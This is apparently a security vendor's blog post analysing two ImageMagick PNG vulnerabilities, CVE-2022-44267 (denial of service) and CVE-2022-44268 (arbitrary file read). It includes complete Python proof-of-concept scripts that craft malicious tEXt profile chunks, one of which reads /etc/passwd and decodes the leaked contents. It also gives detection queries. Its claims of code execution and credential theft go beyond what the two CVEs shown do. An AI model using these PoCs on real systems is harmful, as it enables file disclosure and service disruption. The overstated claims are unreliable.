ImageMagick Vulnerability: Denial of Service (DoS) & Arbitrary File Read Exploitation

Blog Author
Siddartha Malladi

A critical security issue was recently uncovered in ImageMagick, the widely-used image manipulation software suite. It’s used by many websites, applications, and systems to process user-uploaded images and has been discovered to have zero day vulnerabilities that can allow an attacker to execute malicious code.

What is ImageMagick?

The open source ImageMagick suite enables users to create, edit, and manipulate images in a variety of formats. A key feature is its support for multiple image types, including popular formats such as PNG, JPEG, and SVG. This lets users easily convert image formats, thus making ImageMagick a flexible solution for many image processing needs.

 

ImageMagick tools can perform various manipulations, including image resizing, cropping, and making color adjustments. They’re accessed through a command-line interface (CLI) or integrated into applications and systems using its API. This makes it a popular choice among individual users, web developers, and organizations for use in websites and applications such as photo editors, e-commerce platforms, and social media sites.

 

Vulnerability root cause

ImageMagick can read and process images that contain embedded text chunks. These can include additional information about a given image, such as comments, captions, or other metadata. The root cause of this ImageMagick vulnerability is that it doesn’t properly validate input it receives from text chunks.

 

Thus an attacker can embed malicious code into an image text chunk (e.g., raw profile) and trick the software into executing it. Theft of login credentials or other stored data then becomes likely.

 

To leverage this vulnerability, an attacker would need to find a way to deliver a malicious image to a targeted user, perhaps by sending it as an email attachment or hosting it on a website. If the recipient then processes the image in ImageMagick, the code is executed and the attacker is able to exfiltrate sensitive information.

 

This vulnerability affects the PNG image format handled by ImageMagick that contains a tEXt chunk. Let us understand about PNG image format in detail and we’ll show you an example using a PNG image.

 

Understanding PNG

PNG (Portable Network Graphics) is a popular image format that uses a chunk-based structure to store image data and metadata. Each chunk has a type, length, and data set. PNG chunk types include IHDR (image header), IDAT (image data), tEXt (textual data), and others.

 

  • IHDR – Contains image information such as its width, height, color depth, and compression method
  • IDAT – Contains the actual image data in a compressed form
  • IEND (image end) – Marks the end of the PNG data stream

But attackers would use the tEXt chunk to exploit the vulnerability.

  • tEXt – Permits keyword and text string inclusion. The data is stored in plain text and can be easily read by anyone who opens the image. It might include copyright notices, image descriptions, comments, and other information.

 

What Is Raw Profile?

Raw profile refers to metadata (in binary format) stored as a chunk within a file, but isn’t processed or interpreted by the image processor. It can contain additional information not supported by the standard PNG specification, but is specific to a particular application or use (e.g., color management, image quality control, or as a means of embedding metadata).

 

CVE-2022-44267: Denial of Service Vulnerability

ImageMagick is vulnerable to a denial of service (DoS) attack when it parses a PNG image having a filename that’s a single dash (“-”). The conversion process could be left waiting for stdin input (fig.1). 

 

Figure_1-1

Figure 1 - strace log output to show it’s waiting for stdin

 

Exploitation

The following is the proof of concept (PoC) script corresponding to this CVE. Before testing it, open your terminal and run the following commands (to verify you have all the required dependencies).

 

     →  python3 -m pip install pypng
     →  sudo apt-get install -y pngcrush exiv2 imagemagick

import png
import subprocess
width = 1
height = 1
img = []
for y in range(height):
    row = ()
    for x in range(width):
        row = row + (x, max(0, 1 - x - y), y)
    img.append(row)
with open('sample.png', 'wb') as f:
    w = png.Writer(width, height, greyscale=False)
    w.write(f, img)
subprocess.run(["pngcrush", "-text", "a", "profile", "-", "sample.png"])
subprocess.run(["exiv2", "-pS", "pngout.png"])
subprocess.run(["convert", "pngout.png", "poc.png"])

 

Detection

Our Uptycs XDR (extended detection and response) tool scans and detects all such vulnerabilities. Use the following query:

 

  • select cve_list, package_name, package_version, os, indicator_version, indicator_operator from vulnerabilities where cve_list = 'CVE-2022-44267'

Figure_2-1

Figure 2 - Detection of CVE-2022-44267 using a vulnerability scan

 

CVE-2022-44268: Arbitrary File Read Vulnerability

ImageMagick is susceptible to revealing information. When processing a PNG image, such as for resizing, the result might contain data from any file if the software has the required access privileges.

 

Exploitation

We’ve created a python script (fig. 3) that generates a sample PNG using the pypng library. It injects the malicious text chunk with profile as the keyword and the string /etc/passwd as the value using the pngcrush tool:

 

Figure_3-1

Figure 3 - Hexdump of sample PNG file generated through PoC script

 

Refer to the command in figure 4 for a better understanding:

  • pngcrush -text a “profile” “/etc/passwd” sample.png

Figure_4-1

Figure 4 - Hexdump of PNGOUT.PNG generated after adding the malicious tEXT chunk

 

The exiv2 tool produces the metadata (fig. 5):

 

Figure_5-1

Figure 5 - exiv2 output of PNGOUT.PNG

 

Convert is an ImageMagick utility that lets users perform image manipulation tasks such as resizing, cropping, and changing its color. It can be used from the command line or integrated into other applications through the corresponding API.

 

This feature interprets the chunk data by reading the /etc/passwd file. 

 

Figure_6

Figure 6 - Using the convert command

 

When using the CLI, ImageMagick reads text chunks within an image using the identify command. It analyzes image content and provides information about its format, dimensions, color depth, and other metadata—including the text chunk if one is present.

 

You can use the following CLI syntax to view text chunks within an image:

  • identify -verbose image.png

Figure_7

Figure 7 - Identify command output

 

Figure_8

Figure 8 - Decoding the encoded /etc/passwd string

 

The following (PoC) script corresponds to this CVE. Before testing it, open your terminal and run the following commands to verify you have all the required dependencies:

     →  python3 -m pip install pypng
       sudo apt-get install -y pngcrush exiv2 imagemagick

import png
import subprocess
import codecs
width = 1
height = 1
img = []
for y in range(height):
    row = ()
    for x in range(width):
        row = row + (x, max(0, 1 - x - y), y)
    img.append(row)
with open('sample.png', 'wb') as f:
    w = png.Writer(width, height, greyscale=False)
    w.write(f, img)
subprocess.run(["pngcrush", "-text", "a", "profile", "/etc/passwd", "sample.png"])
subprocess.run(["exiv2", "-pS", "pngout.png"])
subprocess.run(["convert", "pngout.png", "poc.png"])
output = subprocess.check_output(["identify", "-verbose", "poc.png"])
output = output.split(b'\n')
hex_strings = ""
for i in output:
    try:
        converted_bytes = codecs.decode(i, 'hex')
        hex_strings += i.decode('ascii')
    except Exception as e:
        pass
print("Encoded hex string:", hex_strings)
converted_hex_string = codecs.decode(hex_strings, 'hex')
print("Decoded hex string:", converted_hex_string)

 

This script not only reads the /etc/passwd file, but also any other files that have read permissions (e.g., /etc/hosts).

 

Detection

Uptycs XDR detects all such vulnerabilities. Run the following query:

select cve_list, package_name, package_version, os, indicator_version, indicator_operator from vulnerabilities where cve_list = 'CVE-2022-44268'

Figure_9

Figure 9 - Detection of CVE-2022-44268 using vulnerability scan

 

Conclusion

 

Discovery of ImageMagick zero-day vulnerabilities highlights the importance of staying vigilant regarding the security of software components used in your systems. Updating software, being aware of security implications, and following best practices to secure systems are essential steps in protecting against potential attacks. To mitigate such risk, it’s recommended to limit the image format types that can be processed by ImageMagick and to use a sanitizer or a code-execution sandbox.